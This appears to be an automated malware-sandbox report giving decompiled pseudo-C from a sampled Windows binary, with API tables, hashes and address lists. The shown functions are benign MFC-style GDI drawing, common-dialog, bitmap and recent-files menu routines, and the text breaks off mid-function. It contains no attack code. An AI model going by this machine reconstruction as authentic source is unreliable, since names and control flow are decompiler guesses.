                  0x0041cd00
                  0x00000000
                  0x0041cbfa
                  0x0041cbff
                  0x0041cc0e
                  0x00000000
                  0x00000000
                  0x0041cc16
                  0x0041cc1b
                  0x0041cc21
                  0x0041cc30
                  0x0041cc47
                  0x0041cc54
                  0x0041cc5e
                  0x0041cc61
                  0x0041cc64
                  0x0041cc6a
                  0x0041cc70
                  0x0041cc73
                  0x0041cc82
                  0x0041cc8d
                  0x0041cca6
                  0x0041ccb4
                  0x0041ccc2
                  0x0041ccc5
                  0x0041ccc9
                  0x0041cccc
                  0x0041ccd2
                  0x0041c9a0
                  0x0041c9a3
                  0x0041c9a6
                  0x0041c9b1
                  0x0041c9b6
                  0x0041c9bc
                  0x0041c9b8
                  0x0041c9b8
                  0x0041c9b8
                  0x0041c9c5
                  0x0041c9c8
                  0x0041c9d9
                  0x0041c9dc
                  0x0041c9e7
                  0x0041c9e9
                  0x0041c9ee
                  0x0041c9f0
                  0x0041c9fb
                  0x0041ca01
                  0x0041ca09
                  0x0041ca12
                  0x0041ca12
                  0x0041ca01
                  0x0041c9ee
                  0x00000000
                  0x0041ccd8
                  0x00000000
                  0x0041ccd8
                  0x0041ccd2
                  0x0041cbf4
                  0x0041c995

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C90B
                    • Part of subcall function 0041B41D: GetViewportOrgEx.GDI32(?,?), ref: 0041B42B
                  • GetSysColor.USER32(00000006), ref: 0041C94F
                    • Part of subcall function 0041B3F9: CreatePen.GDI32(?,?,?), ref: 0041B40A
                  • GetSysColor.USER32(00000010), ref: 0041C96F
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0041CA29
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0041CA39
                  • SetRect.USER32 ref: 0041CA4D
                  • GetClientRect.USER32 ref: 0041CACB
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422ACF
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422AE2
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B443: Rectangle.GDI32(?,?,?,?,?), ref: 0041B459
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BDD
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BF0
                    • Part of subcall function 004226D4: MoveToEx.GDI32(?,?,?,00000000), ref: 004226F1
                    • Part of subcall function 004226D4: LineTo.GDI32(?,?,?), ref: 00422700
                  • GetStockObject.GDI32(00000000), ref: 0041CBC7
                  • FillRect.USER32 ref: 0041CBD8
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042DB24: SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                    • Part of subcall function 0042DB24: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                    • Part of subcall function 0042DB24: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                    • Part of subcall function 0042DB24: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceRectWindow$MoveObjectViewport$ColorSelect$ClientClipCreateFillH_prolog3IntersectLineModeRectangleStock
                  • String ID: ($</E$</E$</E
                  • API String ID: 4163831729-2541786092
                  • Opcode ID: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction ID: 4748042c30c6ea2c037a8edb363e0c25ba98aba555b109a0587ae0009503a143
                  • Opcode Fuzzy Hash: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction Fuzzy Hash: 99E13A71A002199FCB05DFA8D985FEDB7B6FF48304F1440AAE919AB256CB34A941CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042A570, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 129registryclipboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0042A570(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x406452);
					_t54 = 0x466508;
					_t68 = E00420AEC(__ebx, 0x466508, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E00406436(__ebx, 0x466508, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E0040EE68(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							E0040FCD3( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x466928; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E0040EE68(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E0041E99D(_t70, 0x454738);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x46691c; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x466920; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x466918; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x466924; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1d4; // 0x1d4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
								goto L26;
							}
							_t40 = E00417298(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						_t54 = 0x40e;
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x466918 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x46691c = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x466920 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x466924 = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x466928 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x46692c = _t46;
						_push(_a12);
						_t31 = E00417499(_t52, _t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                  0x0042a570
                  0x0042a57b
                  0x0042a584
                  0x0042a585
                  0x0042a58a
                  0x0042a594
                  0x0042a596
                  0x0042a598
                  0x0042a59a
                  0x0042a59a
                  0x0042a59f
                  0x0042a5a2
                  0x0042a5ac
                  0x0042a5ae
                  0x0042a5b3
                  0x0042a5b6
                  0x0042a5bb
                  0x0042a5bb
                  0x0042a5ae
                  0x0042a5be
                  0x0042a5bf
                  0x0042a5c7
                  0x0042a5c9
                  0x0042a632
                  0x0042a638
                  0x0042a6fd
                  0x0042a708
                  0x0042a710
                  0x0042a710
                  0x00000000
                  0x0042a710
                  0x0042a63e
                  0x0042a640
                  0x0042a651
                  0x0042a651
                  0x0042a657
                  0x0042a6e5
                  0x0042a6e5
                  0x00000000
                  0x0042a6e5
                  0x0042a665
                  0x0042a667
                  0x0042a669
                  0x00000000
                  0x00000000
                  0x0042a672
                  0x0042a677
                  0x0042a679
                  0x0042a68b
                  0x0042a68b
                  0x0042a691
                  0x0042a6a2
                  0x0042a6a8
                  0x0042a6c4
                  0x0042a6ca
                  0x0042a6e9
                  0x0042a6ef
                  0x00000000
                  0x00000000
                  0x0042a6f5
                  0x00000000
                  0x0042a6f5
                  0x0042a6d1
                  0x0042a6d1
                  0x0042a6df
                  0x00000000
                  0x0042a6df
                  0x0042a6ad
                  0x0042a6ad
                  0x0042a6b3
                  0x0042a6b9
                  0x0042a6bf
                  0x00000000
                  0x0042a6bf
                  0x0042a69a
                  0x00000000
                  0x0042a69a
                  0x0042a67d
                  0x0042a682
                  0x0042a689
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a689
                  0x0042a642
                  0x0042a647
                  0x0042a64b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a5cb
                  0x0042a5dd
                  0x0042a5e9
                  0x0042a5f5
                  0x0042a601
                  0x0042a60d
                  0x0042a612
                  0x0042a614
                  0x0042a617
                  0x0042a61c
                  0x0042a623
                  0x0042a711
                  0x00000000
                  0x0042a712
                  0x0042a5c9
                  0x00000000

                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 0042A5D6
                  • RegisterClipboardFormatA.USER32 ref: 0042A5E2
                  • RegisterClipboardFormatA.USER32 ref: 0042A5EE
                  • RegisterClipboardFormatA.USER32 ref: 0042A5FA
                  • RegisterClipboardFormatA.USER32 ref: 0042A606
                  • RegisterClipboardFormatA.USER32 ref: 0042A612
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1228543026-3888057576
                  • Opcode ID: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction ID: b1fb21f4436616dfddf3654ade33f9c9fefc51839f7fc6c1fd550e6eedef1f38
                  • Opcode Fuzzy Hash: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction Fuzzy Hash: A841D270700225EBCF219F21ED88A6E3BA1EB84314B65043BFC415B251D77D88A5CBAF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406B0C, Relevance: 22.6, APIs: 15, Instructions: 144COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406B0C(signed int _a4, signed int _a8, int _a12) {
				BITMAPINFO* _v8;
				struct HDC__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				BITMAPINFO* _t54;
				BITMAPINFO* _t59;
				signed char _t63;
				struct HDC__* _t69;
				struct HBITMAP__* _t70;
				void* _t74;
				struct HDC__* _t75;
				struct HWND__* _t84;
				intOrPtr* _t92;
				void* _t97;
				signed int _t98;
				intOrPtr _t102;
				int* _t103;
				int _t104;
				BITMAPINFO* _t107;

				_t53 = LoadResource(_a4, _a8);
				_t84 = 0;
				_v24 = _t53;
				if(_t53 != 0) {
					_t54 = LockResource(_t53);
					_v8 = _t54;
					__eflags = _t54;
					if(_t54 == 0) {
						goto L1;
					}
					_t101 = _t54->bmiHeader + 0x40;
					_t107 = E0043108C(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
					__eflags = _t107;
					if(_t107 != 0) {
						E004059F9(_t101, _t107, _t107, _t101, _v8, _t101);
						_t59 = _t107 + _t107->bmiHeader;
						__eflags = _t59;
						_v12 = _t59;
						_a8 = 0;
						do {
							_t92 = _t59 + _a8 * 4;
							_t102 =  *_t92;
							_t98 = 0;
							__eflags = 0;
							_v16 = _t92;
							while(1) {
								__eflags = _t102 -  *((intOrPtr*)(0x44fbec + _t98 * 8));
								if(_t102 ==  *((intOrPtr*)(0x44fbec + _t98 * 8))) {
									break;
								}
								_t98 = _t98 + 1;
								__eflags = _t98 - 4;
								if(_t98 < 4) {
									continue;
								}
								goto L14;
							}
							__eflags = _a12 - _t84;
							if(_a12 == _t84) {
								_t103 = 0x44fbf0 + _t98 * 8;
								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
								_t63 = GetSysColor( *_t103);
								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
								_t59 = _v12;
								_t84 = 0;
								__eflags = 0;
							} else {
								__eflags =  *(0x44fbf0 + _t98 * 8) - 0x12;
								if( *(0x44fbf0 + _t98 * 8) != 0x12) {
									 *_t92 = 0xffffff;
								}
							}
							L14:
							_a8 = _a8 + 1;
							__eflags = _a8 - 0x10;
						} while (_a8 < 0x10);
						_t104 = _t107->bmiHeader.biWidth;
						_a12 = _t104;
						_a8 = _t107->bmiHeader.biHeight;
						_t69 = GetDC(_t84);
						_v12 = _t69;
						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
						_v16 = _t70;
						__eflags = _t70 - _t84;
						if(__eflags != 0) {
							_t75 = CreateCompatibleDC(_v12);
							_t104 = SelectObject;
							_a4 = _t75;
							_v20 = SelectObject(_t75, _v16);
							__eflags = 1;
							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + 0x28 + (1 << _t107->bmiHeader.biBitCount) * 4, _t107, _t84, 0xcc0020);
							SelectObject(_a4, _v20);
							DeleteDC(_a4);
						}
						ReleaseDC(_t84, _v12);
						_push(_t107);
						E004316F6(_t84, _t104, _t107, __eflags);
						FreeResource(_v24);
						_t74 = _v16;
						goto L18;
					} else {
						_t74 = 0;
						L18:
						return _t74;
					}
				}
				L1:
				return 0;
			}




























                  0x00406b1b
                  0x00406b21
                  0x00406b23
                  0x00406b28
                  0x00406b32
                  0x00406b38
                  0x00406b3b
                  0x00406b3d
                  0x00000000
                  0x00000000
                  0x00406b43
                  0x00406b4c
                  0x00406b4f
                  0x00406b51
                  0x00406b60
                  0x00406b6a
                  0x00406b6a
                  0x00406b6c
                  0x00406b6f
                  0x00406b72
                  0x00406b75
                  0x00406b78
                  0x00406b7a
                  0x00406b7a
                  0x00406b7c
                  0x00406b7f
                  0x00406b7f
                  0x00406b86
                  0x00000000
                  0x00000000
                  0x00406b88
                  0x00406b89
                  0x00406b8c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406b8e
                  0x00406b90
                  0x00406b93
                  0x00406bad
                  0x00406bc0
                  0x00406bc3
                  0x00406be4
                  0x00406be6
                  0x00406be9
                  0x00406be9
                  0x00406b95
                  0x00406b95
                  0x00406b9d
                  0x00406b9f
                  0x00406b9f
                  0x00406b9d
                  0x00406beb
                  0x00406beb
                  0x00406bee
                  0x00406bee
                  0x00406bf8
                  0x00406bff
                  0x00406c02
                  0x00406c05
                  0x00406c0e
                  0x00406c13
                  0x00406c19
                  0x00406c1c
                  0x00406c1e
                  0x00406c23
                  0x00406c2c
                  0x00406c33
                  0x00406c40
                  0x00406c48
                  0x00406c65
                  0x00406c71
                  0x00406c76
                  0x00406c76
                  0x00406c80
                  0x00406c86
                  0x00406c87
                  0x00406c90
                  0x00406c96
                  0x00000000
                  0x00406b53
                  0x00406b53
                  0x00406c99
                  0x00000000
                  0x00406c9a
                  0x00406b51
                  0x00406b2a
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction ID: ff51ff42c0de1c3a1b4d8765aabfec9eb562106eb3c68f9e24e3f7d0f5cce2f8
                  • Opcode Fuzzy Hash: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction Fuzzy Hash: D9519FB5800218FFDB019FA5CC888AE7BB5FF49314B11843AF916E7260C735AA61DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042CFF6, Relevance: 22.6, APIs: 15, Instructions: 84windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E0042CFF6(intOrPtr* __ecx) {
				void* _v8;
				void* _t19;
				void* _t21;
				void* _t45;

				_push(__ecx);
				if( *(__ecx + 4) != 0) {
					_t21 = SelectObject( *(__ecx + 8), GetStockObject(7));
					_v8 = _t21;
					SelectObject( *(__ecx + 8), _t21);
					SelectObject( *(__ecx + 4), _v8);
					_t45 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t45);
					SelectObject( *(__ecx + 4), _t45);
					E00422568(__ecx, GetROP2( *(__ecx + 8)));
					E00422504(__ecx, GetBkMode( *(__ecx + 8)));
					E0042270B(__ecx, GetTextAlign( *(__ecx + 8)));
					E00422536(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E0042259A(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(E0042CF92(__ecx, GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(E0042CF92(__ecx, GetBkColor( *(__ecx + 8))));
					_t19 =  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}







                  0x0042cffb
                  0x0042d003
                  0x0042d01f
                  0x0042d025
                  0x0042d028
                  0x0042d030
                  0x0042d03c
                  0x0042d042
                  0x0042d048
                  0x0042d056
                  0x0042d067
                  0x0042d078
                  0x0042d089
                  0x0042d09a
                  0x0042d0b2
                  0x0042d0b5
                  0x0042d0cb
                  0x0042d0ce
                  0x0042d0d2
                  0x0042d0d5

                  APIs
                  • GetStockObject.GDI32(00000007), ref: 0042D013
                  • SelectObject.GDI32(?,00000000), ref: 0042D01F
                  • SelectObject.GDI32(?,00000000), ref: 0042D028
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D030
                  • GetStockObject.GDI32(00000004), ref: 0042D034
                  • SelectObject.GDI32(?,00000000), ref: 0042D03A
                  • SelectObject.GDI32(?,00000000), ref: 0042D042
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D048
                  • GetROP2.GDI32(?), ref: 0042D04D
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422585
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422592
                  • GetBkMode.GDI32(?), ref: 0042D05E
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                  • GetTextAlign.GDI32(?), ref: 0042D06F
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 0042272A
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 00422737
                  • GetPolyFillMode.GDI32(?), ref: 0042D080
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422553
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422560
                  • GetStretchBltMode.GDI32(?), ref: 0042D091
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225B7
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225C4
                  • GetTextColor.GDI32(?), ref: 0042D0A2
                    • Part of subcall function 0042CF92: GetNearestColor.GDI32(?,?), ref: 0042CF9D
                  • GetBkColor.GDI32(?), ref: 0042D0BB
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Mode$Object$Select$Text$AlignColorFillPolyStretch$Stock$Nearest
                  • String ID:
                  • API String ID: 1146216143-0
                  • Opcode ID: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction ID: 2f3b6f2030e1e86d12445eb7730afd10813b0898199679e719625b019b3605a4
                  • Opcode Fuzzy Hash: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction Fuzzy Hash: C2216075200A24BFCB217B67DD08D2FBAEAFF88704740842DF15A82570CB75AD52DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426E96, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00426E96(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				long _v32;
				char _v268;
				char _v292;
				void* _v296;
				signed int _v300;
				char _v304;
				signed int _v308;
				long _v312;
				char _v316;
				char _v320;
				signed int _t103;
				void* _t110;
				long _t115;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t139;
				intOrPtr _t142;
				void* _t146;
				intOrPtr* _t148;
				void* _t171;
				void* _t181;
				void* _t183;
				int _t184;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t187;
				intOrPtr _t188;
				int _t203;
				void* _t220;
				CHAR* _t222;
				intOrPtr* _t223;
				signed int _t224;
				void* _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				signed int _t231;
				signed int _t233;
				void* _t234;

				_t220 = __edx;
				_t186 = __ecx;
				_t181 = __ebx;
				_t231 = _t233;
				_t234 = _t233 - 0x108;
				_t103 =  *0x463404; // 0x18eab29f
				_v8 = _t103 ^ _t231;
				_push(__esi);
				_push(__edi);
				_t222 = _a4;
				_t227 = __ecx;
				if(_t222 == 0 || lstrlenA(_t222) >= 0x104) {
					_push(0);
					_push(0xffffffff);
					_push(3);
					E0042EA62(_t181, _t220, _t222, _t227, __eflags);
					asm("int3");
					_push(0x130);
					E00431B04(E0044C36D, _t181, _t222, _t227);
					_t228 = _a4;
					__eflags = _t228;
					_t223 = _t186;
					__eflags = 0 | _t228 != 0x00000000;
					if(__eflags == 0) {
						E00406436(_t181, _t186, _t223, _t228, __eflags);
					}
					_t187 =  *(_t228 + 0xc);
					_t182 = _t223 + 0x1c;
					_t110 =  *_t182;
					__eflags =  *(_t110 - 0xc);
					if( *(_t110 - 0xc) == 0) {
						__eflags = _t187;
						if(_t187 != 0) {
							E0041F5B6(_t182, _t187,  *(_t228 + 4), _t182, 0);
						}
					}
					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 8))));
					__eflags =  *(_t188 - 0xc);
					if( *(_t188 - 0xc) != 0) {
						__eflags =  *(_t228 + 0xc);
						if( *(_t228 + 0xc) != 0) {
							_t183 = 0;
							__eflags =  *(_t223 + 4);
							if( *(_t223 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t228 + 0xc) + 4),  *(_t228 + 4) + _t183, 0);
									_t183 = _t183 + 1;
									__eflags = _t183 -  *(_t223 + 4);
								} while (_t183 <  *(_t223 + 4));
							}
							_t182 = 0x104;
							_t115 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t115;
							if(_t115 != 0) {
								__eflags = _t115 - 0x104;
								if(_t115 < 0x104) {
									_t184 = lstrlenA( &_v292);
									 *((char*)(_t231 + _t184 - 0x120)) = 0x5c;
									_t182 = _t184 + 1;
									_v312 = _t182;
									 *((char*)(_t231 + _t182 - 0x120)) = 0;
									E004014C0( &_v308, _t220);
									_v8 = _v8 & 0x00000000;
									E004014C0( &_v304, _t220);
									_v300 = _v300 & 0x00000000;
									__eflags =  *(_t223 + 4);
									_v8 = 1;
									if( *(_t223 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t223 + 8))( &_v308, _v300,  &_v292, _t182, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L42;
											}
											_t185 = _v308;
											_v296 = E004014F0( &_v304,  *((intOrPtr*)(_t185 - 0xc)) +  *((intOrPtr*)(_t185 - 0xc)));
											while(1) {
												_t129 =  *_t185;
												__eflags = _t129;
												if(_t129 == 0) {
													break;
												}
												__eflags = _t129 - 0x26;
												if(_t129 == 0x26) {
													_t59 =  &_v296;
													 *_t59 = _v296 + 1;
													__eflags =  *_t59;
													 *_v296 = 0x26;
												}
												_t131 = E00434A02( *_t185);
												__eflags = _t131;
												if(_t131 != 0) {
													_v296 = _v296 + 1;
													 *_v296 =  *_t185;
													_t185 = _t185 + 1;
													__eflags = _t185;
												}
												_v296 = _v296 + 1;
												 *_v296 =  *_t185;
												_t185 = _t185 + 1;
												__eflags = _t185;
											}
											 *_v296 = 0;
											E0040A356( &_v304, 0xffffffff);
											_t139 =  *((intOrPtr*)(_t223 + 0x14)) + _v300 + 0x00000001 & 0x0000000f;
											_t203 = 0xa;
											__eflags = _t139 - _t203;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													_push(_t139);
													_push("&%d ");
													goto L40;
												} else {
													E004048C1(_t185, _t203, _t223, _t228, E00433C67(_t220,  &_v32, _t203, "1&0 "));
												}
											} else {
												_push(_t139);
												_push("%d ");
												L40:
												swprintf( &_v32, _t203);
											}
											_t142 =  *((intOrPtr*)(_t228 + 8));
											_t182 =  *(_t228 + 4);
											_v296 = _t142;
											 *((intOrPtr*)(_t228 + 8)) = _t142 + 1;
											_t79 = _t182 + 1; // 0x2
											 *(_t228 + 4) = _t79;
											_push( &_v32);
											_t146 = E00406039( *(_t228 + 4),  &_v320, _t220, _t223, _t228, __eflags);
											_push( &_v304);
											_push(_t146);
											_push( &_v316);
											_v8 = 2;
											_t148 = E00426CA7( *(_t228 + 4), _t223, _t228, __eflags);
											_t234 = _t234 + 0x1c;
											E00426898( *(_t228 + 0xc), _v296, 0x400,  *(_t228 + 4),  *_t148);
											E004010B0(_v316 + 0xfffffff0, _t220);
											_v8 = 1;
											E004010B0(_v320 + 0xfffffff0, _t220);
											_v300 = _v300 + 1;
											__eflags = _v300 -  *(_t223 + 4);
											if(_v300 <  *(_t223 + 4)) {
												_t182 = _v312;
												continue;
											}
											goto L42;
										}
									}
									L42:
									 *((intOrPtr*)(_t228 + 8)) =  *((intOrPtr*)(_t228 + 8)) - 1;
									 *((intOrPtr*)(_t228 + 0x20)) = GetMenuItemCount( *( *(_t228 + 0xc) + 4));
									 *((intOrPtr*)(_t228 + 0x18)) = 1;
									E004010B0(_v304 + 0xfffffff0, _t220);
									__eflags = _v308 + 0xfffffff0;
									E004010B0(_v308 + 0xfffffff0, _t220);
								}
							}
						}
					} else {
						_t182 =  *_t182;
						__eflags =  *(_t182 - 0xc);
						if( *(_t182 - 0xc) != 0) {
							 *((intOrPtr*)( *_t228 + 0xc))(_t182);
						}
						 *((intOrPtr*)( *_t228))(0);
					}
					return E00431B87(_t182, _t223, _t228);
				} else {
					E004292D1( &_v268, _t222);
					_t224 = 0;
					if( *((intOrPtr*)(_t227 + 4)) - 1 > 0) {
